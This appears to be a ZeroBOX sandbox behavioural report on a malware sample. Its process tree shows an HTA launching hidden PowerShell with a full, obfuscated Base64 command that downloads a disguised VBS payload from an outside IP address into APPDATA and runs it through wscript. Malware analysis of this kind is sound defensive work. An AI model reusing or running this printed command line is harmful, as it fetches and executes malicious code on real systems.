| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IENETCache.hta.html
2724
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2724 CREDAT:145409
  2812
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c POWershell.exE -Ex BypAss -nOP -w 1 -C dEVicecREdEntiALdeploYMent ; iEx($(IeX('[SysteM.text.EnCOding]'+[CHaR]58+[ChaR]0X3A+'utF8.GetStRInG([SYSTEm.cOnVErT]'+[CHAr]0X3A+[CHar]58+'frOMBasE64sTrINg('+[cHaR]34+'JDBScSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJkZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVWpaT25haSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtScXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLRmRGWVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalNNenZQaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYcUZoYlJpbngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTUhtQkNxa1NpVEEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1c1RjQkFZcHVtWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDBScTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNTYvb2theW5ld2VyYWdpZmNvbWV0by5naWYiLCIkZW5WOkFQUERBVEFcb2theW5ld2VyYWdpZmNvbWV0LnZCUyIsMCwwKTtzdEFSVC1zbEVlUCgzKTtTVEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxva2F5bmV3ZXJhZ2lmY29tZXQudkJTIg=='+[CHAR]0X22+'))')))"
    3052
    - powershell.exe POWershell.exE -Ex BypAss -nOP -w 1 -C dEVicecREdEntiALdeploYMent ; iEx($(IeX('[SysteM.text.EnCOding]'+[CHaR]58+[ChaR]0X3A+'utF8.GetStRInG([SYSTEm.cOnVErT]'+[CHAr]0X3A+[CHar]58+'frOMBasE64sTrINg('+[cHaR]34+'JDBScSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJkZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVWpaT25haSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtScXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLRmRGWVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalNNenZQaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYcUZoYlJpbngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTUhtQkNxa1NpVEEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1c1RjQkFZcHVtWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDBScTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNTYvb2theW5ld2VyYWdpZmNvbWV0by5naWYiLCIkZW5WOkFQUERBVEFcb2theW5ld2VyYWdpZmNvbWV0LnZCUyIsMCwwKTtzdEFSVC1zbEVlUCgzKTtTVEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxva2F5bmV3ZXJhZ2lmY29tZXQudkJTIg=='+[CHAR]0X22+'))')))"
      908
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\-dkbv9vj.cmdline"
        2408
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESA5D1.tmp" "c:\Users\test22\AppData\Local\Temp\CSCA563.tmp"
        2588
      - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\okayneweragifcomet.vBS"
        1304

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents